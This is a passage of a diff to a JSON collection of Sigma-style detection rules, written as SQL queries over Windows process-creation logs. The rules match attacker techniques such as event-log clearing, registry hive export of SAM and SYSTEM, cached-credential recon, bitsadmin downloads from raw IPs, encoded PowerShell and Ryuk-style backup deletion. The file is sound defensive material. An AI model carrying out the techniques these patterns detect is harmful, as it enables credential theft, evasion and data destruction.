- "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "status": "test", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { "title": "Potential Windows Defender Tampering Via Wmic.EXE", @@ -7508,765 +7293,738 @@ "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", - "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "status": "stable", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "Legitimate software creating script event consumers" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + }, + { + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1543.003" + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "description": "Detects the use of SDelete to erase a file not the free space", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Authorized administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", - "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1027", - "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Administrative script libraries" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", "attack.persistence", - "attack.privilege_escalation" + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", - "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "PUA - NirCmd Execution As LOCAL SYSTEM", - "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", - "status": "test", - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "status": "experimental", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nircmd_as_system.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", - "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", + "status": "test", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "author": "Florian Roth (Nextron Systems)", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "description": "Detects suspicious renamed SysInternals DebugView execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "status": "experimental", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": 